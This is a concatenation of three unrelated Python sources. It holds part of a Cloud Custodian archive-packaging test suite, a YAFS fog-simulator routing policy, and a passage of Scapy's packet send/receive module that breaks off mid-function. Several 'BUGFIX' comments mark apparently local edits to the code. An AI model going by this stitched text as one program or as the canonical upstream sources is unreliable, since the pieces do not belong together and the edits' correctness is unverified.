        installer.install_namespaces()
        # NOTE: relies on the private site._init_pathinfo helper.
        site.addsitedir(tmp_sitedir, known_paths=site._init_pathinfo())

    def test_handles_namespace_packages(self):
        """pkg_resources-style namespace packages: the -nspkg.pth is bundled,
        the synthetic namespace __init__ is not."""
        bench = tempfile.mkdtemp()

        def cleanup():
            while bench in sys.path:
                sys.path.remove(bench)
            shutil.rmtree(bench)

        self.addCleanup(cleanup)
        subpackage = os.path.join(bench, "namespace_package", "subpackage")
        os.makedirs(subpackage)
        open(os.path.join(subpackage, "__init__.py"), "w+").write("foo = 42\n")

        def _():
            from namespace_package.subpackage import foo
            assert foo  # dodge linter

        # Not importable until the namespace package is installed.
        self.assertRaises(ImportError, _)
        self._install_namespace_package(bench)
        from namespace_package.subpackage import foo
        self.assertEqual(foo, 42)
        filenames = self.get_filenames(["namespace_package"])
        self.assertTrue("namespace_package/__init__.py" not in filenames)
        self.assertTrue("namespace_package/subpackage/__init__.py" in filenames)
        self.assertTrue(filenames[-1].endswith("-nspkg.pth"))

    def test_excludes_non_py_files(self):
        """Non-Python files living next to a module are not bundled."""
        filenames = self.get_filenames(["ctypes"])
        self.assertTrue("README.ctypes" not in filenames)

    def test_cant_get_bytes_when_open(self):
        """get_bytes asserts the archive has been closed first."""
        archive = self.make_open_archive()
        self.assertRaises(AssertionError, archive.get_bytes)

    def test_cant_add_files_when_closed(self):
        """add_file asserts the archive is still open."""
        archive = self.make_archive()
        self.assertRaises(AssertionError, archive.add_file, __file__)

    def test_cant_add_contents_when_closed(self):
        """add_contents asserts the archive is still open."""
        archive = self.make_archive()
        self.assertRaises(AssertionError, archive.add_contents, "foo", "bar")

    def test_can_add_additional_files_while_open(self):
        """Files added before close appear under their basename."""
        archive = self.make_open_archive()
        archive.add_file(__file__)
        archive.close()
        filenames = archive.get_filenames()
        self.assertTrue(os.path.basename(__file__) in filenames)

    def test_can_set_path_when_adding_files(self):
        """An explicit dest path overrides the file's own basename."""
        archive = self.make_open_archive()
        archive.add_file(__file__, "cheese/is/yummy.txt")
        archive.close()
        filenames = archive.get_filenames()
        self.assertTrue(os.path.basename(__file__) not in filenames)
        self.assertTrue("cheese/is/yummy.txt" in filenames)

    def test_can_add_a_file_with_contents_from_a_string(self):
        """add_contents writes a literal string as an entry."""
        archive = self.make_open_archive()
        archive.add_contents("cheese.txt", "So yummy!")
        archive.close()
        self.assertTrue("cheese.txt" in archive.get_filenames())
        with archive.get_reader() as reader:
            self.assertEqual(b"So yummy!", reader.read("cheese.txt"))

    def test_custodian_archive_creates_a_custodian_archive(self):
        """custodian_archive bundles c7n plus pkg_resources."""
        archive = custodian_archive()
        self.addCleanup(archive.remove)
        archive.close()
        filenames = archive.get_filenames()
        self.assertTrue("c7n/__init__.py" in filenames)
        self.assertTrue("pkg_resources/__init__.py" in filenames)

    def make_file(self):
        """Create a throwaway text file in a temp dir; returns its path."""
        bench = tempfile.mkdtemp()
        path = os.path.join(bench, "foo.txt")
        open(path, "w+").write("Foo.")
        self.addCleanup(lambda: shutil.rmtree(bench))
        return path

    def check_world_readable(self, archive):
        """Assert every zip entry carries the world-readable permission bit
        (stored in the upper 16 bits of external_attr)."""
        world_readable = 0o004 << 16
        for info in zipfile.ZipFile(archive.path).filelist:
            self.assertEqual(info.external_attr & world_readable, world_readable)

    def test_files_are_all_readable(self):
        self.check_world_readable(self.make_archive(["c7n"]))

    def test_even_unreadable_files_become_readable(self):
        """Source permissions are normalized when a path is added."""
        path = self.make_file()
        os.chmod(path, 0o600)
        archive = self.make_open_archive()
        archive.add_file(path)
        archive.close()
        self.check_world_readable(archive)

    def test_unless_you_make_your_own_zipinfo(self):
        """Passing a prebuilt ZipInfo bypasses permission normalization."""
        info = zipfile.ZipInfo(self.make_file())
        archive = self.make_open_archive()
        archive.add_contents(info, "foo.txt")
        archive.close()
        self.assertRaises(AssertionError, self.check_world_readable, archive)

    def test_cache_zip_file(self):
        """cache_file seeds the archive with the entries of an existing zip."""
        archive = self.make_archive(cache_file=os.path.join(os.path.dirname(__file__),
                                                            "data",
                                                            "test.zip"))
        self.assertTrue("cheese.txt" in archive.get_filenames())
        self.assertTrue("cheese/is/yummy.txt" in archive.get_filenames())
        with archive.get_reader() as reader:
            self.assertEqual(b"So yummy!", reader.read("cheese.txt"))
            self.assertEqual(b"True!", reader.read("cheese/is/yummy.txt"))
class PycCase(unittest.TestCase):
    """Fixture providing a scratch dir on sys.path plus a helper that writes
    .py modules with compiled .pyc siblings."""

    def setUp(self):
        # Scratch directory goes at the front of sys.path so modules written
        # into it are importable by name.
        bench = tempfile.mkdtemp()
        sys.path.insert(0, bench)
        self.bench = bench

    def tearDown(self):
        bench = self.bench
        sys.path.remove(bench)
        shutil.rmtree(bench)

    def py_with_pyc(self, name):
        """Write a trivial module *name* into the bench dir, byte-compile it,
        and return the path to the .py file."""
        target = os.path.join(self.bench, name)
        with open(target, "w+") as handle:
            handle.write("42")
        py_compile.compile(target)
        return target
class Constructor(PycCase):
    """PythonPackageArchive's constructor accepts only importable *.py modules."""

    def test_class_constructor_only_accepts_py_modules_not_pyc(self):
        """A module importable only via its .pyc is rejected with ValueError
        (on interpreters where lone .pyc files import at all)."""
        # Create a module with both *.py and *.pyc.
        self.py_with_pyc("foo.py")
        # Create another with a *.pyc but no *.py behind it.
        os.unlink(self.py_with_pyc("bar.py"))
        # Now: *.py takes precedence over *.pyc ...
        def get(name):
            # Basename of the file a fresh import of *name* resolves to.
            return os.path.basename(importlib.import_module(name).__file__)
        # NOTE(review): assertTrue(get("foo"), "foo.py") treats "foo.py" as the
        # msg argument, not an expected value — assertEqual was likely intended.
        self.assertTrue(get("foo"), "foo.py")
        try:
            # ... and while *.pyc is importable ...
            self.assertTrue(get("bar"), "bar.pyc")
        except ImportError:
            try:
                # (except on PyPy)
                # http://doc.pypy.org/en/latest/config/objspace.lonepycfiles.html
                self.assertEqual(platform.python_implementation(), "PyPy")
            except AssertionError:
                # (... aaaaaand Python 3)
                self.assertEqual(platform.python_version_tuple()[0], "3")
        else:
            # ... we refuse it.
            with self.assertRaises(ValueError) as raised:
                PythonPackageArchive(modules=["bar"])
            msg = raised.exception.args[0]
            self.assertTrue(msg.startswith("Could not find a *.py source file"))
            self.assertTrue(msg.endswith("bar.pyc"))
        # We readily ignore a *.pyc if a *.py exists.
        archive = PythonPackageArchive(modules=["foo"])
        archive.close()
        self.assertEqual(archive.get_filenames(), ["foo.py"])
        with archive.get_reader() as reader:
            self.assertEqual(b"42", reader.read("foo.py"))
class AddPyFile(PycCase):
    """PythonPackageArchive.add_py_file's handling of .py vs .pyc inputs."""

    def test_can_add_py_file(self):
        """A plain .py file is added under its basename."""
        archive = PythonPackageArchive()
        archive.add_py_file(self.py_with_pyc("foo.py"))
        archive.close()
        self.assertEqual(archive.get_filenames(), ["foo.py"])

    def test_reverts_to_py_if_available(self):
        """Given a .pyc path, the sibling .py source is bundled instead."""
        archive = PythonPackageArchive()
        py = self.py_with_pyc("foo.py")
        archive.add_py_file(py + "c")
        archive.close()
        self.assertEqual(archive.get_filenames(), ["foo.py"])

    def test_fails_if_py_not_available(self):
        """Given a .pyc path with no .py source, IOError is raised."""
        archive = PythonPackageArchive()
        py = self.py_with_pyc("foo.py")
        os.unlink(py)
        self.assertRaises(IOError, archive.add_py_file, py + "c")
class DiffTags(unittest.TestCase):
    """LambdaManager.diff_tags returns (tags_to_set, tag_keys_to_remove)."""

    def test_empty(self):
        """No tags on either side: nothing to add or remove."""
        assert LambdaManager.diff_tags({}, {}) == ({}, [])

    def test_removal(self):
        """A tag present only in the old set is scheduled for removal."""
        assert LambdaManager.diff_tags({"Foo": "Bar"}, {}) == ({}, ["Foo"])

    def test_addition(self):
        """A tag present only in the new set is scheduled for addition."""
        assert LambdaManager.diff_tags({}, {"Foo": "Bar"}) == ({"Foo": "Bar"}, [])

    def test_update(self):
        """A changed value is re-set, not removed."""
        assert LambdaManager.diff_tags(
            {"Foo": "Bar"}, {"Foo": "Baz"}) == ({"Foo": "Baz"}, [])
|
from yafs.selection import Selection
import networkx as nx
from collections import Counter
class DeviceSpeedAwareRouting(Selection):
    """Selection policy that routes each message to the closest deployed
    service instance (by hop count), breaking distance ties with a
    round-robin schedule over a per-instance usage counter."""

    def __init__(self):
        self.cache = {}
        # Usage count per DES id, drives the round-robin tie breaking.
        self.counter = Counter()
        self.invalid_cache_value = True
        # key: (source node, service name) -> (path, DES id) last selected
        self.controlServices = {}
        super(DeviceSpeedAwareRouting, self).__init__()

    def compute_BEST_DES(self, node_src, alloc_DES, sim, DES_dst, message):
        """Return ``(path, des)`` for the best instance in ``DES_dst``.

        The best instance is the one reachable from ``node_src`` through
        the shortest path (hop count). When several instances are equally
        close, the least-used one according to ``self.counter`` wins.
        Returns ``([], None)`` when no instance is reachable.
        """
        try:
            best_len = float('inf')
            best_path = []
            best_des = []
            tied = []  # [(des, path)] of instances at distance best_len
            for dev in DES_dst:
                node_dst = alloc_DES[dev]
                path = list(nx.shortest_path(sim.topology.G, source=node_src, target=node_dst))
                n_hops = len(path)
                if n_hops < best_len:
                    best_len = n_hops
                    best_path = path
                    best_des = dev
                    tied = []
                elif n_hops == best_len:
                    # Another service instance sits at the same distance.
                    if not tied:
                        tied.append((best_des, best_path))
                    tied.append((dev, path))
            if tied:
                # Two or more equally close instances: round-robin schedule.
                # BUGFIX: the original comparison was inverted
                # (`minCounter < self.counter[service]`) and assigned the
                # whole Counter object to the minimum, so the first tied
                # instance always won; it also returned the path of the
                # *first* best instance regardless of which DES was chosen.
                best_idx = 0
                min_count = float('inf')
                for idx, (service, service_path) in enumerate(tied):
                    if service not in self.counter:
                        # Never used yet: pick it straight away.
                        return service_path, service
                    if self.counter[service] < min_count:
                        min_count = self.counter[service]
                        best_idx = idx
                return tied[best_idx][1], tied[best_idx][0]
            return best_path, best_des
        except (nx.NetworkXNoPath, nx.NodeNotFound):
            self.logger.warning("There is no path between two nodes: %s - %s " % (node_src, node_dst))
            return [], None

    def get_path(self, sim, app_name, message, topology_src, alloc_DES, alloc_module, traffic, from_des):
        """Compute the route for ``message``.

        Returns ``([path], [des])`` on success or ``([], None)`` when the
        source node is not connected to any instance.
        """
        node_src = topology_src  # entity that sends the message
        service = message.dst  # name of the destination service
        DES_dst = alloc_module[app_name][message.dst]  # instances able to serve it
        path, des = self.compute_BEST_DES(node_src, alloc_DES, sim, DES_dst, message)
        try:
            dc = int(des)
            # Account the choice for round-robin and remember the decision.
            self.counter[dc] += 1
            self.controlServices[(node_src, service)] = (path, des)
        except TypeError:
            # des is None: the node is not linked with other nodes.
            return [], None
        return [path], [des]

    def clear_routing_cache(self):
        """Drop all cached routing decisions and round-robin state."""
        self.invalid_cache_value = False
        self.cache = {}
        self.counter = Counter()
        self.controlServices = {}

    def get_path_from_failure(self, sim, message, link, alloc_DES, alloc_module, traffic, ctime, from_des):
        """Reroute a message whose current path crossed the failed ``link``."""
        idx = message.path.index(link[0])
        if idx == len(message.path):
            # The node who serves ... not possible case
            return [], []
        node_src = message.path[idx]  # entity at which the failure was seen
        path, des = self.get_path(sim, message.app_name, message, node_src,
                                  alloc_DES, alloc_module, traffic, from_des)
        # BUGFIX: guard the ([], None) result from get_path, which previously
        # raised IndexError on path[0].
        if path and len(path[0]) > 0:
            # Splice the already-travelled prefix with the recomputed route.
            concPath = message.path[0:message.path.index(path[0][0])] + path[0]
            message.dst_int = node_src
            return [concPath], des
        return [], []
|
# This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Philippe Biondi <phil@secdev.org>
# This program is published under a GPLv2 license
"""
Functions to send and receive packets.
"""
from __future__ import absolute_import, print_function
import itertools
from threading import Thread, Event
import os
import re
import subprocess
import time
import types
from scapy.compat import plain_str
from scapy.data import ETH_P_ALL
from scapy.config import conf
from scapy.error import warning
from scapy.interfaces import (
network_name,
resolve_iface,
NetworkInterface,
)
from scapy.packet import Packet
from scapy.utils import get_temp_file, tcpdump, wrpcap, \
ContextManagerSubprocess, PcapReader
from scapy.plist import (
PacketList,
QueryAnswer,
SndRcvList,
)
from scapy.error import log_runtime, log_interactive, Scapy_Exception
from scapy.base_classes import Gen, SetGen
from scapy.modules import six
from scapy.modules.six.moves import map
from scapy.sessions import DefaultSession
from scapy.supersocket import SuperSocket, IterSocket
# Typing imports
from scapy.compat import (
Any,
Callable,
Dict,
Iterator,
List,
Optional,
Tuple,
Type,
Union,
cast
)
from scapy.interfaces import _GlobInterfaceType
from scapy.plist import _PacketIterable
if conf.route is None:
# unused import, only to initialize conf.route and conf.iface*
import scapy.route # noqa: F401
#################
# Debug class #
#################
class debug:
    # Artefacts of the last sndrcv() run, refreshed when conf.debug_match
    # is set (see SndRcvHandler.__init__).
    recv = PacketList([], "Received")
    sent = PacketList([], "Sent")
    match = SndRcvList([], "Matched")
    # Last (packet class, raw bytes) pair that made dissection crash, if any.
    crashed_on = None  # type: Optional[Tuple[Type[Packet], bytes]]
####################
# Send / Receive #
####################
_DOC_SNDRCV_PARAMS = """
:param pks: SuperSocket instance to send/receive packets
:param pkt: the packet to send
:param rcv_pks: if set, will be used instead of pks to receive packets.
packets will still be sent through pks
:param nofilter: put 1 to avoid use of BPF filters
:param retry: if positive, how many times to resend unanswered packets
if negative, how many times to retry when no more packets
are answered
:param timeout: how much time to wait after the last packet has been sent
:param verbose: set verbosity level
:param multi: whether to accept multiple answers for the same stimulus
:param prebuild: pre-build the packets before starting to send them.
Automatically enabled when a generator is passed as the packet
"""
_GlobSessionType = Union[Type[DefaultSession], DefaultSession]
class SndRcvHandler(object):
    """
    Util to send/receive packets, used by sr*().
    Do not use directly.
    This matches the requests and answers.
    Notes::
      - threaded mode: enabling threaded mode will likely
        break packet timestamps, but might result in a speedup
        when sending a big amount of packets. Disabled by default
      - DEVS: store the outgoing timestamp right BEFORE sending the packet
        to avoid races that could result in negative latency. We aren't Stadia
    """
    def __init__(self,
                 pks,  # type: SuperSocket
                 pkt,  # type: _PacketIterable
                 timeout=None,  # type: Optional[int]
                 inter=0,  # type: int
                 verbose=None,  # type: Optional[int]
                 chainCC=False,  # type: bool
                 retry=0,  # type: int
                 multi=False,  # type: bool
                 rcv_pks=None,  # type: Optional[SuperSocket]
                 prebuild=False,  # type: bool
                 _flood=None,  # type: Optional[Tuple[int, Callable[[], None]]]  # noqa: E501
                 threaded=False,  # type: bool
                 session=None  # type: Optional[_GlobSessionType]
                 ):
        # type: (...) -> None
        # Instantiate all arguments
        if verbose is None:
            verbose = conf.verb
        if conf.debug_match:
            # Reset the global debug artefacts for this run.
            debug.recv = PacketList([], "Received")
            debug.sent = PacketList([], "Sent")
            debug.match = SndRcvList([], "Matched")
        self.nbrecv = 0  # packets received that matched no sent packet
        self.ans = []  # type: List[QueryAnswer]
        self.pks = pks
        self.rcv_pks = rcv_pks or pks  # receive on rcv_pks when provided
        self.inter = inter
        self.verbose = verbose
        self.chainCC = chainCC
        self.multi = multi
        self.timeout = timeout
        self.session = session
        # Instantiate packet holders
        if _flood:
            # Flood mode: pkt is an infinite generator; _flood[0] carries the
            # real number of distinct packets to account for.
            self.tobesent = pkt  # type: Union[_PacketIterable, SetGen[Packet]]
            self.notans = _flood[0]
        else:
            if isinstance(pkt, types.GeneratorType) or prebuild:
                # Materialize the generator so it can be resent on retry.
                self.tobesent = list(pkt)
                self.notans = len(self.tobesent)
            else:
                self.tobesent = (
                    SetGen(pkt) if not isinstance(pkt, Gen) else pkt
                )
                self.notans = self.tobesent.__iterlen__()
        if retry < 0:
            # Negative retry: retry until no more answers arrive.
            autostop = retry = -retry
        else:
            autostop = 0
        if timeout is not None and timeout < 0:
            # Negative timeout means "wait forever".
            self.timeout = None
        while retry >= 0:
            # hashret() of each sent packet -> list of packets with that hash,
            # used by _process_packet to match answers.
            self.hsent = {}  # type: Dict[bytes, List[Packet]]
            if threaded or _flood:
                # Send packets in thread.
                # https://github.com/secdev/scapy/issues/1791
                snd_thread = Thread(
                    target=self._sndrcv_snd
                )
                snd_thread.setDaemon(True)
                # Start routine with callback
                self._sndrcv_rcv(snd_thread.start)
                # Ended. Let's close gracefully
                if _flood:
                    # Flood: stop send thread
                    _flood[1]()
                snd_thread.join()
            else:
                self._sndrcv_rcv(self._sndrcv_snd)
            if multi:
                # Keep only packets that never got any answer.
                remain = [
                    p for p in itertools.chain(*six.itervalues(self.hsent))
                    if not hasattr(p, '_answered')
                ]
            else:
                remain = list(itertools.chain(*six.itervalues(self.hsent)))
            if autostop and len(remain) > 0 and \
                    len(remain) != len(self.tobesent):
                # Progress was made: reset the retry budget.
                retry = autostop
            # Next round only resends the unanswered packets.
            self.tobesent = remain
            if len(self.tobesent) == 0:
                break
            retry -= 1
        if conf.debug_match:
            debug.sent = PacketList(remain[:], "Sent")
            debug.match = SndRcvList(self.ans[:])
        # Clean the ans list to delete the field _answered
        if multi:
            for snd, _ in self.ans:
                if hasattr(snd, '_answered'):
                    del snd._answered
        if verbose:
            print(
                "\nReceived %i packets, got %i answers, "
                "remaining %i packets" % (
                    self.nbrecv + len(self.ans), len(self.ans), self.notans
                )
            )
        self.ans_result = SndRcvList(self.ans)
        self.unans_result = PacketList(remain, "Unanswered")

    def results(self):
        # type: () -> Tuple[SndRcvList, PacketList]
        """Return the (answered, unanswered) lists built by __init__."""
        return self.ans_result, self.unans_result

    def _sndrcv_snd(self):
        # type: () -> None
        """Function used in the sending thread of sndrcv()"""
        try:
            if self.verbose:
                print("Begin emission:")
            i = 0
            for p in self.tobesent:
                # Populate the dictionary of _sndrcv_rcv
                # _sndrcv_rcv won't miss the answer of a packet that
                # has not been sent
                self.hsent.setdefault(p.hashret(), []).append(p)
                # Send packet
                self.pks.send(p)
                time.sleep(self.inter)
                i += 1
            if self.verbose:
                print("Finished sending %i packets." % i)
        except SystemExit:
            pass
        except Exception:
            # Never let a send error kill the receive side; just log it.
            log_runtime.exception("--- Error sending packets")

    def _process_packet(self, r):
        # type: (Packet) -> None
        """Internal function used to process each packet."""
        if r is None:
            return
        ok = False
        h = r.hashret()
        if h in self.hsent:
            hlst = self.hsent[h]
            for i, sentpkt in enumerate(hlst):
                if r.answers(sentpkt):
                    self.ans.append(QueryAnswer(sentpkt, r))
                    if self.verbose > 1:
                        os.write(1, b"*")
                    ok = True
                    if not self.multi:
                        # Single-answer mode: stop matching this packet.
                        del hlst[i]
                        self.notans -= 1
                    else:
                        # Multi mode: count the packet as answered once but
                        # keep it so further answers can still match.
                        if not hasattr(sentpkt, '_answered'):
                            self.notans -= 1
                        sentpkt._answered = 1
                    break
        if self.notans <= 0 and not self.multi:
            # Everything answered: stop sniffing early.
            if self.sniffer:
                self.sniffer.stop(join=False)
        if not ok:
            if self.verbose > 1:
                os.write(1, b".")
            self.nbrecv += 1
            if conf.debug_match:
                debug.recv.append(r)

    def _sndrcv_rcv(self, callback):
        # type: (Callable[[], None]) -> None
        """Function used to receive packets and check their hashret"""
        self.sniffer = None  # type: Optional[AsyncSniffer]
        try:
            self.sniffer = AsyncSniffer()
            # started_callback fires the sender once the sniffer is ready,
            # so no answer can arrive before we listen.
            self.sniffer._run(
                prn=self._process_packet,
                timeout=self.timeout,
                store=False,
                opened_socket=self.rcv_pks,
                session=self.session,
                started_callback=callback
            )
        except KeyboardInterrupt:
            if self.chainCC:
                raise
def sndrcv(*args, **kwargs):
    # type: (*Any, **Any) -> Tuple[SndRcvList, PacketList]
    """Scapy raw function to send a packet and receive its answer.
    WARNING: This is an internal function. Using sr/srp/sr1/srp is
    more appropriate in many cases.
    """
    # Delegate the whole send/match/receive cycle to SndRcvHandler.
    return SndRcvHandler(*args, **kwargs).results()
def __gen_send(s,  # type: SuperSocket
               x,  # type: _PacketIterable
               inter=0,  # type: int
               loop=0,  # type: int
               count=None,  # type: Optional[int]
               verbose=None,  # type: Optional[int]
               realtime=False,  # type: bool
               return_packets=False,  # type: bool
               *args,  # type: Any
               **kargs  # type: Any
               ):
    # type: (...) -> Optional[PacketList]
    """
    An internal function used by send/sendp to actually send the packets,
    implement the send logic...
    It will take care of iterating through the different packets
    """
    if isinstance(x, str):
        x = conf.raw_layer(load=x)
    if not isinstance(x, Gen):
        x = SetGen(x)
    if verbose is None:
        verbose = conf.verb
    sent = 0
    # A positive count wins over loop and is expressed as a negative loop
    # counter that climbs back to zero; loop=0 means "send once".
    if count is not None:
        loop = -count
    elif not loop:
        loop = -1
    if return_packets:
        sent_packets = PacketList()
    try:
        while loop:
            base_delta = None
            for pkt in x:
                if realtime:
                    # Replay packets spaced by their recorded timestamps.
                    now = time.time()
                    if base_delta:
                        wait = base_delta + float(pkt.time) - now
                        if wait > 0:
                            time.sleep(wait)
                    else:
                        base_delta = now - float(pkt.time)
                s.send(pkt)
                if return_packets:
                    sent_packets.append(pkt)
                sent += 1
                if verbose:
                    os.write(1, b".")
                time.sleep(inter)
            if loop < 0:
                loop += 1
    except KeyboardInterrupt:
        pass
    if verbose:
        print("\nSent %i packets." % sent)
    return sent_packets if return_packets else None
def _send(x,  # type: _PacketIterable
          _func,  # type: Callable[[NetworkInterface], Type[SuperSocket]]
          inter=0,  # type: int
          loop=0,  # type: int
          iface=None,  # type: Optional[_GlobInterfaceType]
          count=None,  # type: Optional[int]
          verbose=None,  # type: Optional[int]
          realtime=False,  # type: bool
          return_packets=False,  # type: bool
          socket=None,  # type: Optional[SuperSocket]
          **kargs  # type: Any
          ):
    # type: (...) -> Optional[PacketList]
    """Internal function used by send and sendp"""
    # Only close the socket if we opened it ourselves.
    own_socket = socket is None
    iface = resolve_iface(iface or conf.iface)
    if own_socket:
        socket = _func(iface)(iface=iface, **kargs)
    results = __gen_send(socket, x, inter=inter, loop=loop,
                         count=count, verbose=verbose,
                         realtime=realtime, return_packets=return_packets)
    if own_socket:
        socket.close()
    return results
@conf.commands.register
def send(x,  # type: _PacketIterable
         iface=None,  # type: Optional[_GlobInterfaceType]
         **kargs  # type: Any
         ):
    # type: (...) -> Optional[PacketList]
    """
    Send packets at layer 3
    :param x: the packets
    :param inter: time (in s) between two packets (default 0)
    :param loop: send packet indefinetly (default 0)
    :param count: number of packets to send (default None=1)
    :param verbose: verbose mode (default None=conf.verbose)
    :param realtime: check that a packet was sent before sending the next one
    :param return_packets: return the sent packets
    :param socket: the socket to use (default is conf.L3socket(kargs))
    :param iface: the interface to send the packets on
    :param monitor: (not on linux) send in monitor mode
    :returns: None
    """
    # Derive the interface from the packet's routing when not given.
    selected_iface = _interface_selection(iface, x)

    def _l3_socket(netif):
        # Build the L3 socket class for the resolved interface.
        return netif.l3socket()

    return _send(x, _l3_socket, iface=selected_iface, **kargs)
@conf.commands.register
def sendp(x,  # type: _PacketIterable
          iface=None,  # type: Optional[_GlobInterfaceType]
          iface_hint=None,  # type: Optional[str]
          socket=None,  # type: Optional[SuperSocket]
          **kargs  # type: Any
          ):
    # type: (...) -> Optional[PacketList]
    """
    Send packets at layer 2
    :param x: the packets
    :param inter: time (in s) between two packets (default 0)
    :param loop: send packet indefinetly (default 0)
    :param count: number of packets to send (default None=1)
    :param verbose: verbose mode (default None=conf.verbose)
    :param realtime: check that a packet was sent before sending the next one
    :param return_packets: return the sent packets
    :param socket: the socket to use (default is conf.L3socket(kargs))
    :param iface: the interface to send the packets on
    :param monitor: (not on linux) send in monitor mode
    :returns: None
    """
    # The routing-table hint only applies when neither an explicit
    # interface nor an already-open socket was supplied.
    if iface is None and iface_hint is not None and socket is None:
        iface = conf.route.route(iface_hint)[0]

    def _l2_socket(netif):
        # Build the L2 socket class for the resolved interface.
        return netif.l2socket()

    return _send(x, _l2_socket, iface=iface, socket=socket, **kargs)
@conf.commands.register
def sendpfast(x,  # type: _PacketIterable
              pps=None,  # type: Optional[float]
              mbps=None,  # type: Optional[float]
              realtime=False,  # type: bool
              loop=0,  # type: int
              file_cache=False,  # type: bool
              iface=None,  # type: Optional[_GlobInterfaceType]
              replay_args=None,  # type: Optional[List[str]]
              parse_results=False,  # type: bool
              ):
    # type: (...) -> Optional[Dict[str, Any]]
    """Send packets at layer 2 using tcpreplay for performance
    :param pps: packets per second
    :param mbps: MBits per second
    :param realtime: use packet's timestamp, bending time with real-time value
    :param loop: number of times to process the packet list
    :param file_cache: cache packets in RAM instead of reading from
        disk at each iteration
    :param iface: output interface
    :param replay_args: List of additional tcpreplay args (List[str])
    :param parse_results: Return a dictionary of information
        outputted by tcpreplay (default=False)
    :returns: stdout, stderr, command used
    """
    if iface is None:
        iface = conf.iface
    argv = [conf.prog.tcpreplay, "--intf1=%s" % network_name(iface)]
    if pps is not None:
        argv.append("--pps=%i" % pps)
    elif mbps is not None:
        argv.append("--mbps=%f" % mbps)
    elif realtime:
        # BUGFIX: this was `realtime is not None`, which is always true for
        # the default realtime=False — tcpreplay then got --multiplier=0 and
        # the --topspeed fallback below was unreachable.
        argv.append("--multiplier=%f" % realtime)
    else:
        argv.append("--topspeed")
    if loop:
        argv.append("--loop=%i" % loop)
    if file_cache:
        argv.append("--preload-pcap")
    # Check for any additional args we didn't cover.
    if replay_args is not None:
        argv.extend(replay_args)
    # Dump the packets to a temporary pcap that tcpreplay will read.
    f = get_temp_file()
    argv.append(f)
    wrpcap(f, x)
    results = None
    with ContextManagerSubprocess(conf.prog.tcpreplay):
        try:
            cmd = subprocess.Popen(argv, stdout=subprocess.PIPE,
                                   stderr=subprocess.PIPE)
        except KeyboardInterrupt:
            log_interactive.info("Interrupted by user")
        except Exception:
            os.unlink(f)
            raise
        else:
            stdout, stderr = cmd.communicate()
            if stderr:
                log_runtime.warning(stderr.decode())
            if parse_results:
                results = _parse_tcpreplay_result(stdout, stderr, argv)
            elif conf.verb > 2:
                log_runtime.info(stdout.decode())
            # Remove the temporary pcap once tcpreplay has finished with it.
            os.unlink(f)
    return results
def _parse_tcpreplay_result(stdout_b, stderr_b, argv):
    # type: (bytes, bytes, List[str]) -> Dict[str, Any]
    """
    Parse the output of tcpreplay and modify the results_dict to populate output information.  # noqa: E501
    Tested with tcpreplay v3.4.4
    Tested with tcpreplay v4.1.2
    :param stdout: stdout of tcpreplay subprocess call
    :param stderr: stderr of tcpreplay subprocess call
    :param argv: the command used in the subprocess call
    :return: dictionary containing the results
    """
    try:
        results = {}
        out_text = plain_str(stdout_b).lower()
        err_lines = plain_str(stderr_b).strip().split("\n")
        # Value types expected after each known line prefix.
        elements = {
            "actual": (int, int, float),
            "rated": (float, float, float),
            "flows": (int, float, int, int),
            "attempted": (int,),
            "successful": (int,),
            "failed": (int,),
            "truncated": (int,),
            "retried packets (eno": (int,),
            "retried packets (eag": (int,),
        }
        # Result-key names for prefixes that carry several values.
        multi = {
            "actual": ("packets", "bytes", "time"),
            "rated": ("bps", "mbps", "pps"),
            "flows": ("flows", "fps", "flow_packets", "non_flow"),
            "retried packets (eno": ("retried_enobufs",),
            "retried packets (eag": ("retried_eagain",),
        }
        float_reg = r"([0-9]*\.[0-9]+|[0-9]+)"
        int_reg = r"([0-9]+)"
        any_reg = r"[^0-9]*"
        r_types = {int: int_reg, float: float_reg}
        for raw_line in out_text.split("\n"):
            stripped = raw_line.strip()
            for prefix, kinds in elements.items():
                if not stripped.startswith(prefix):
                    continue
                pattern = any_reg.join(r_types[k] for k in kinds)
                found = re.search(pattern, stripped)
                names = multi.get(prefix, [prefix])
                for pos, kind in enumerate(kinds):
                    if found:
                        results[names[pos]] = kind(found.group(pos + 1))
        results["command"] = " ".join(argv)
        results["warnings"] = err_lines[:-1]
        return results
    except Exception as parse_exception:
        if not conf.interactive:
            raise
        log_runtime.error("Error parsing output: %s", parse_exception)
        return {}
@conf.commands.register
def sr(x,  # type: _PacketIterable
       promisc=None,  # type: Optional[bool]
       filter=None,  # type: Optional[str]
       iface=None,  # type: Optional[_GlobInterfaceType]
       nofilter=0,  # type: int
       *args,  # type: Any
       **kargs  # type: Any
       ):
    # type: (...) -> Tuple[SndRcvList, PacketList]
    """
    Send and receive packets at layer 3
    """
    # Open the layer-3 socket, run the send/receive engine, then release it.
    sock = conf.L3socket(promisc=promisc, filter=filter,
                         iface=iface, nofilter=nofilter)
    answered_unanswered = sndrcv(sock, x, *args, **kargs)
    sock.close()
    return answered_unanswered
def _interface_selection(iface,  # type: Optional[_GlobInterfaceType]
                         packet  # type: _PacketIterable
                         ):
    # type: (...) -> _GlobInterfaceType
    """
    Select the network interface according to the layer 3 destination
    """
    # An explicitly supplied interface always wins.
    if iface is not None:
        return iface
    try:
        # Route the first packet to find the outgoing interface.
        candidate = next(packet.__iter__()).route()[0]
    except AttributeError:
        candidate = None
    return candidate or conf.iface
@conf.commands.register
def sr1(x,  # type: _PacketIterable
        promisc=None,  # type: Optional[bool]
        filter=None,  # type: Optional[str]
        iface=None,  # type: Optional[_GlobInterfaceType]
        nofilter=0,  # type: int
        *args,  # type: Any
        **kargs  # type: Any
        ):
    # type: (...) -> Optional[Packet]
    """
    Send packets at layer 3 and return only the first answer
    """
    iface = _interface_selection(iface, x)
    sock = conf.L3socket(promisc=promisc, filter=filter,
                         nofilter=nofilter, iface=iface)
    answered = sndrcv(sock, x, *args, **kargs)[0]
    sock.close()
    # First matched (sent, received) pair -> its received half, if any.
    if len(answered) > 0:
        return cast(Packet, answered[0][1])
    return None
@conf.commands.register
def srp(x,  # type: Packet
        promisc=None,  # type: Optional[bool]
        iface=None,  # type: Optional[_GlobInterfaceType]
        iface_hint=None,  # type: Optional[str]
        filter=None,  # type: Optional[str]
        nofilter=0,  # type: int
        type=ETH_P_ALL,  # type: int
        *args,  # type: Any
        **kargs  # type: Any
        ):
    # type: (...) -> Tuple[SndRcvList, PacketList]
    """
    Send and receive packets at layer 2
    """
    # Fall back to the routing table when only a destination hint is given.
    if iface is None and iface_hint is not None:
        iface = conf.route.route(iface_hint)[0]
